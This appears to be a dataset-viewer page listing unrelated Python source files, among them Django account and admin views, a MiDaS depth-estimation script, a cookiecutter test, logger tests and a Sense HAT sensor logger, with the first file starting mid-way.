        # index.1.json is a fixture index that lists the audreyr/pypackage template.
        index = os.path.join((os.path.dirname(os.path.abspath(__file__))), 'index.1.json')
        channel = Channel(settings=settings, index=index)

        # Adding installs the template tree, including its cookiecutter.json.
        channel.add("audreyr/pypackage")
        destination_path = os.path.join(settings['templates_dir'], 'audreyr', 'pypackage')
        self.assertTrue(os.path.exists(destination_path))
        destination_path = os.path.join(destination_path, 'cookiecutter.json')
        self.assertTrue(os.path.exists(destination_path))

        # Removing deletes the installed tree again.
        channel.remove("audreyr/pypackage")
        destination_path = os.path.join(settings['templates_dir'], 'audreyr', 'pypackage')
        self.assertFalse(os.path.exists(destination_path))

    def tearDown(self):
        # Wipe anything installed during the test.
        shutil.rmtree(self.templates_dir)
|
from django.shortcuts import redirect
from django.contrib.auth.forms import UserCreationForm
from django.views.generic.edit import FormView
from django.http import JsonResponse
from django.contrib.auth import get_user_model, authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views import View
from .forms import LoginForm, MessageForm
from .utils import send_feedback
from .models import Message
import requests
import json
from smtplib import SMTPAuthenticationError
User = get_user_model()
class FeedbackView(LoginRequiredMixin, FormView):
    """AJAX feedback form: enriches the sender from a demo user service, then e-mails the message."""

    login_url = '/'
    template_name = 'accounts/feedback.html'
    form_class = MessageForm

    def form_valid(self, form):
        errors = []
        cd = form.cleaned_data
        message = Message(sender=cd['sender'], body=cd['body'])
        # Look up the sender's profile on the placeholder API by e-mail.
        # NOTE(review): plain HTTP, no timeout, and no error handling on this
        # request — confirm this is acceptable for production.
        r = requests.get('http://jsonplaceholder.typicode.com/users')
        senders = json.loads(r.text)
        sender = {}
        for s in senders:
            if s['email'].lower() == cd['sender'].lower():
                sender = s
        try:
            send_feedback(cd['body'], cd['sender'], sender)
            message.status = 'Ok'
            message.save()
            return JsonResponse({
                'success': True,
                'message': 'Письмо успешно отправлено'
            })
        except (SMTPAuthenticationError, User.DoesNotExist) as ex:
            template = "An exception of type {0} occurred. Arguments:\n{1!r}"
            err = template.format(type(ex).__name__, ex.args)
            print(err)
            # Record the failed attempt so the message is not lost silently.
            message.status = 'Error'
            message.save()
            errors.append(
                'Не удалось отправить сообщение. Повторите попытку позже'
            )
            return JsonResponse({
                'success': False,
                'errors': errors
            })

    def form_invalid(self, form):
        # Flatten Django's {field: [messages]} error dict into a flat list.
        errors = []
        for k, v in form.errors.items():
            for e in v:
                errors.append(e)
        return JsonResponse({
            'success': False,
            'errors': errors
        })
class LoginView(FormView):
    """Authenticate a user from the login form and reply with JSON."""

    template_name = 'accounts/login.html'
    form_class = LoginForm

    def form_valid(self, form):
        cd = form.cleaned_data
        user = authenticate(username=cd['username'], password=cd['password'])
        if user is None:
            return JsonResponse({
                'success': False,
                'errors': ['Введите правильное имя пользователя и пароль']
            })
        login(self.request, user)
        return JsonResponse({'success': True})

    def form_invalid(self, form):
        # Flatten django's per-field error lists into one flat list.
        flat = [e for field_errors in form.errors.values() for e in field_errors]
        return JsonResponse({
            'success': False,
            'errors': flat
        })
class SignupView(FormView):
    """Register a new user account and reply with JSON."""

    template_name = 'accounts/signup.html'
    form_class = UserCreationForm

    def form_valid(self, form):
        cd = form.cleaned_data
        new_user = User(username=cd['username'])
        new_user.set_password(cd['password1'])  # store the hash, not raw text
        new_user.save()
        return JsonResponse({'success': True})

    def form_invalid(self, form):
        # Flatten django's per-field error lists into one flat list.
        flat = [e for field_errors in form.errors.values() for e in field_errors]
        return JsonResponse({
            'success': False,
            'errors': flat
        })
class LogoutView(View):
    """End the current session and send the user back to the login page."""

    def get(self, request):
        logout(request)
        return redirect('accounts:login')
|
# -*- encoding: utf-8 -*-
from django.conf.urls import patterns
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.shortcuts import redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from django_pages.settings import ADMIN_MEDIA_PREFIX
from .models import MenuItem
class MenuAdmin(admin.ModelAdmin):
    # Menus only expose a name: edit it in the form, show it in the changelist.
    fields = ('name', )
    list_display = ('name', )
class MenuItemAdmin(admin.ModelAdmin):
    """Admin for menu items with custom move-up/move-down ordering controls."""

    fields = (('lang', 'menu', 'menuitem_name'), 'url', 'style')
    list_display = (
        'menuitem_name',
        'lang',
        'menu',
        'url',
        'move',
        'position',
        'style'
    )
    list_filter = ('lang', 'menu')
    prepopulated_fields = {"url": ("menuitem_name",)}

    # Changelist URL (with its ordering query string) the move views return to;
    # previously duplicated in move_up and move_down.
    _changelist_url = '/admin/menu/menuitem/?o=2.3.-6.-5'

    def move(self, obj):
        """
        Returns html with links to move_up and move_down views.
        """
        button = u'<a href="%s"><img src="%simg/arrow-%s.png" /> %s</a>'
        prefix = ADMIN_MEDIA_PREFIX
        link = '%d/move_up/' % obj.pk
        html = button % (link, prefix, 'up', _('up')) + " | "
        link = '%d/move_down/' % obj.pk
        html += button % (link, prefix, 'down', _('down'))
        return html
    move.allow_tags = True
    move.short_description = _('Move')

    def get_urls(self):
        """Prepend the custom move_up/move_down views to the default admin URLs."""
        admin_view = self.admin_site.admin_view
        urls = patterns(
            '',
            (r'^(?P<item_pk>\d+)/move_up/$', admin_view(self.move_up)),
            (r'^(?P<item_pk>\d+)/move_down/$', admin_view(self.move_down)),
        )
        return urls + super(MenuItemAdmin, self).get_urls()

    def _move(self, request, item_pk, method_name):
        """Shared permission check + position change for both move views.

        Raises PermissionDenied when the user may not change menu items.
        """
        if not self.has_change_permission(request):
            raise PermissionDenied
        item = get_object_or_404(MenuItem, pk=item_pk)
        getattr(item, method_name)()
        return redirect(self._changelist_url)

    def move_up(self, request, item_pk):
        """Move the item one position up, then return to the changelist."""
        return self._move(request, item_pk, 'increase_position')

    def move_down(self, request, item_pk):
        """Move the item one position down, then return to the changelist."""
        return self._move(request, item_pk, 'decrease_position')
|
"""Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
import utils
import cv2
import argparse
from torchvision.transforms import Compose
from midas.midas_net import MidasNet
from midas.midas_net_custom import MidasNet_small
from midas.transforms import Resize, NormalizeImage, PrepareForNet
def run(input_path, output_path, model_path, model_type="large", optimize=True):
    """Run MonoDepthNN to compute depth maps.

    Args:
        input_path (str): path to input folder
        output_path (str): path to output folder
        model_path (str): path to saved model
        model_type (str): network variant, "large" (MidasNet, 384x384) or
            "small" (MidasNet_small, 256x256)
        optimize (bool): jit-trace the model and, on CUDA, run it in
            channels-last half precision

    Raises:
        ValueError: if `model_type` is neither "large" nor "small".
    """
    print("initialize")

    # select device
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print("device: %s" % device)

    # load network
    if model_type == "large":
        model = MidasNet(model_path, non_negative=True)
        net_w, net_h = 384, 384
    elif model_type == "small":
        model = MidasNet_small(model_path, features=64, backbone="efficientnet_lite3", exportable=True, non_negative=True, blocks={'expand': True})
        net_w, net_h = 256, 256
    else:
        # Raise instead of `print` + `assert False`: asserts are stripped
        # under `python -O`, which would let execution continue with no model.
        raise ValueError(
            f"model_type '{model_type}' not implemented, use: --model_type large"
        )

    transform = Compose(
        [
            Resize(
                net_w,
                net_h,
                resize_target=None,
                keep_aspect_ratio=True,
                ensure_multiple_of=32,
                resize_method="upper_bound",
                image_interpolation_method=cv2.INTER_CUBIC,
            ),
            NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
            PrepareForNet(),
        ]
    )

    model.eval()

    if optimize:
        # Warm up and jit-trace the model once on a dummy input.
        rand_example = torch.rand(1, 3, net_h, net_w)
        model(rand_example)
        traced_script_module = torch.jit.trace(model, rand_example)
        model = traced_script_module

        if device == torch.device("cuda"):
            model = model.to(memory_format=torch.channels_last)
            model = model.half()

    model.to(device)

    # get input
    img_names = glob.glob(os.path.join(input_path, "*"))
    num_images = len(img_names)

    # create output folder
    os.makedirs(output_path, exist_ok=True)

    print("start processing")

    for ind, img_name in enumerate(img_names):
        print(" processing {} ({}/{})".format(img_name, ind + 1, num_images))

        # input
        img = utils.read_image(img_name)
        img_input = transform({"image": img})["image"]

        # compute
        with torch.no_grad():
            sample = torch.from_numpy(img_input).to(device).unsqueeze(0)
            if optimize and device == torch.device("cuda"):
                sample = sample.to(memory_format=torch.channels_last)
                sample = sample.half()
            prediction = model.forward(sample)
            # Upsample the prediction back to the input image resolution.
            prediction = (
                torch.nn.functional.interpolate(
                    prediction.unsqueeze(1),
                    size=img.shape[:2],
                    mode="bicubic",
                    align_corners=False,
                )
                .squeeze()
                .cpu()
                .numpy()
            )

        # output: written next to the input's basename, bits=2 -> 16-bit depth
        filename = os.path.join(
            output_path, os.path.splitext(os.path.basename(img_name))[0]
        )
        utils.write_depth(filename, prediction, bits=2)

    print("finished")
if __name__ == "__main__":
    # Command-line interface for the depth-map runner.
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input_path', default='input',
                        help='folder with input images')
    parser.add_argument('-o', '--output_path', default='output',
                        help='folder for output images')
    parser.add_argument('-m', '--model_weights', default='model-f6b98070.pt',
                        help='path to the trained weights of model')
    parser.add_argument('-t', '--model_type', default='large',
                        help='model type: large or small')
    parser.add_argument('--optimize', dest='optimize', action='store_true')
    parser.add_argument('--no-optimize', dest='optimize', action='store_false')
    parser.set_defaults(optimize=True)
    args = parser.parse_args()

    # set torch options
    torch.backends.cudnn.enabled = True
    torch.backends.cudnn.benchmark = True

    # compute depth maps
    run(args.input_path, args.output_path, args.model_weights,
        args.model_type, args.optimize)
|
from django.conf.urls import url
from .views import *
# Order matters: django resolves against these patterns top to bottom.
urlpatterns = [
    # page views
    url(r'^home$', home, name='home'),
    url(r'^cart$', cart, name='cart'),
    url(r'^market$', market, name='market'),
    url(r'^market_with_params/(\d+)/(\d+)/(\d+)', market_with_params, name='market_with_params'),
    url(r'^mine$', mine, name='mine'),
    # authentication endpoints
    url(r'^register$', RegisterAPI.as_view(), name='register'),
    url(r'^login$', LoginAPI.as_view(), name='login'),
    url(r'^confirm/(.*)', confirm),
    url(r'^logout$', logout_api, name='logout'),
    # cart / order ajax endpoints
    url(r'^cartapi$', cart_api, name='cart_api'),
    url(r'^cart_status$', cart_status_api),
    url(r'^select_all_api$', select_all_api),
    url(r'^cartitem_api$', cartitem_api),
    url(r'^order$', order_api, name='order'),
    url(r'^123$', heike),
    # url(r'^2048$', yx)
]
from numerous.engine.system.binding import Binding
from numerous.utils.dict_wrapper import _DictWrapper
from numerous.engine.system.namespace import _ShadowVariableNamespace
from numerous.engine.system.node import Node
class Connector(Node):
    """
    Base class for representing connectors. Object that inherited connector can be used as
    a connection between items.

    Attributes
    ----------
    bindings : dictionary of :class:`Binding`
        List of binding that connector have.
    """
    def __init__(self, tag, **kw):
        # _DictWrapper is constructed over self.__dict__, so registered
        # bindings are presumably also reachable as plain attributes (which
        # __setattr__ below relies on) — behavior depends on _DictWrapper.
        # `**kw` is accepted but not used here.
        self.bindings = _DictWrapper(self.__dict__, Binding)
        super(Connector, self).__init__(tag)

    def create_binding(self, binding_name):
        """
        Creating a new binding inside the connector

        Parameters
        ----------
        binding_name : string
            name of the new binding

        Raises
        ------
        ValueError
            If `binding_name` is already registered in this connector.
        """
        if binding_name in self.bindings.keys():
            raise ValueError('Binding with name {0} is already registered in connector {1}'
                             .format(binding_name, self.tag))
        else:
            self.bindings[binding_name] = Connector.create_new_binding(binding_name)

    def _create_shadow_namespace(self, param):
        # Propagate a shadow namespace for `param` to every binding.
        self.__update_bindings_namespace(param)

    def update_bindings(self, list_of_eq, binding_name):
        """
        Updating an existing binding with the equations that are expected to be in the binded items.

        Parameters
        ----------
        list_of_eq : list of :class:`numerous.multiphysics.Equation`
            List of a `Equation` that are expected to be in binded items.
        binding_name: string
            Name of a binding to be updated.
        """
        # NOTE(review): this iterates ALL bindings and looks up `binding_name`
        # inside each binding's __dict__ — verify this is intended rather than
        # self.bindings[binding_name].add_equations(list_of_eq).
        for binding in self.bindings:
            binding.__dict__[binding_name].add_equations(list_of_eq)

    def __update_bindings_namespace(self, param):
        # Give each binding a shadow namespace tied to this connector.
        for binding in self.bindings:
            binding.update_namespace(_ShadowVariableNamespace(self, param, binding))

    def get_binded_items(self):
        """
        Get items that are binded to the connector.

        Returns
        -------
        items : list
            all items that are binded to the connector as one list.
        """
        return [
            y.binded_item for y in self.bindings
            if y.binded_item is not None
        ]

    @staticmethod
    def create_new_binding(binding_name):
        """
        Creates a new :class:`Binding` without registering it inside the connector.

        Parameters
        ----------
        binding_name: string
            Name of a binding to be created.

        Returns
        -------
        binding : Binding
            new binding with given name.
        """
        return Binding(binding_name)

    def __setattr__(self, key, value):
        # Assigning a Node to an attribute that currently holds a Binding
        # routes the Node into Binding.add_binding first.
        # NOTE(review): object.__setattr__ then still rebinds the attribute to
        # `value`, replacing the Binding object in __dict__ with the Node —
        # confirm this is intentional (_DictWrapper may mediate lookups).
        if key in self.__dict__:
            if isinstance(self.__dict__[key], Binding):
                if isinstance(value, Node):
                    self.__dict__[key].add_binding(value)
        object.__setattr__(self, key, value)
|
from utilities.logger import *
def read_last_line():
    """Return the last line of the error log, stripped of surrounding whitespace.

    Reads the whole file, so it assumes the log is small enough to fit in
    memory and contains at least one line (IndexError otherwise).
    """
    # `with` guarantees the handle is closed even if readlines() raises;
    # the original open()/close() pair leaked the handle on error.
    with open(Path(Logger.log_path, LogError.error_log_file), "r") as log_file:
        return log_file.readlines()[-1].strip()
def test_submission_error_flask():
    """Submission errors with extra HTML headers are logged in the expected format."""
    headers = {
        "Access-Control-Request-Method": "POST",
        "Accept": "application/json",
        "Content-Length": "2000",
        "Accept-Charset": "utf-8",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
    }
    ErrorAPISubmission("D23478", "Verify failure", ExtraHtmlHeaders(headers)).log_it()
    time = get_date_time()
    expected = f'API_SUB_ERROR, D23478, Verify failure, {time}, Access-Control-Request-Method:POST | Accept:application/json | Content-Length:2000 | Accept-Charset:utf-8 | User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0'
    assert read_last_line() == expected
def test_verification_error():
    """Device verification errors are logged with the API_VER_ERROR tag."""
    ErrorDeviceVerfication("D47848", "NA", None).log_it()
    timestamp = get_date_time()
    assert read_last_line() == f'API_VER_ERROR, D47848, NA, {timestamp}, NA'
def test_validation_error():
    """Data validation errors are logged with the API_VAL_ERROR tag."""
    ErrorDataVailidation("D47848", "error message", None).log_it()
    timestamp = get_date_time()
    assert read_last_line() == f'API_VAL_ERROR, D47848, error message, {timestamp}, NA'
import os
import sys
# Truncate the results file, then play 100 games and append per-game stats.
os.system("echo >xxx.txt")
game_cmd = ('java -jar tools/PlayGame.jar maps/map{0}.txt 1000 100 log.txt '
            '"python verygood.py" "../AD/MyBot" 2> aa.txt')
for game in range(1, 101):
    os.system(game_cmd.format(game))
    os.system("echo {0} >>xxx.txt".format(game))   # record which map was played
    os.system("wc -l aa.txt >> xxx.txt")           # record engine output length
    os.system("grep \"Player \" aa.txt >> xxx.txt")  # record the winner line
|
#!/usr/bin/env python3
from sense_hat import SenseHat
import datetime
import time
from logData import Logger
from checkRange import InRange
from makeRemindercsv import Reminder
import sqlite3
class Info:
    """Reads a timestamp plus temperature and humidity from the Sense HAT."""

    # Seconds to wait between successive samples (used by the caller's loop).
    SAMPLE_FREQUENCY_SECONDS = 3

    def getInfo(self):
        """Return (timestamp, temperature, humidity), readings rounded to 2 dp."""
        # NOTE(review): the standard sense_hat API is instantiated with
        # SenseHat(); getSenseHat() is not part of that API — confirm this is
        # a project-specific wrapper, otherwise this raises AttributeError.
        sense = SenseHat.getSenseHat()
        # e.g. '25/12/2023 09:30 AM'
        timestamp = datetime.datetime.now().strftime('%d/%m/%Y %I:%M %p')
        temperature = sense.get_temperature()
        humidity = sense.get_humidity()
        # Round only when the sensor actually produced a reading.
        if temperature is not None:
            temperature = round(temperature, 2)
        if humidity is not None:
            humidity = round(humidity, 2)
        return timestamp, temperature, humidity
def main():
    """Take three sensor samples, log and display them, then run the checks."""
    info = Info()
    logData = Logger()
    check = InRange()
    reminder = Reminder()
    # Re-read the sensors on every pass: the original sampled once before the
    # loop and logged the same values three times, which defeated the purpose
    # of sleeping SAMPLE_FREQUENCY_SECONDS between log entries.
    for _ in range(0, 3):
        timestamp, temperature, humidity = info.getInfo()
        logData.dataLogger(timestamp, temperature, humidity)
        time.sleep(info.SAMPLE_FREQUENCY_SECONDS)
    logData.displayData()
    reminder.makeReminder()
    # Range check uses the most recent sample.
    check.checkConfig(temperature, humidity)

if __name__ == "__main__":
    main()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.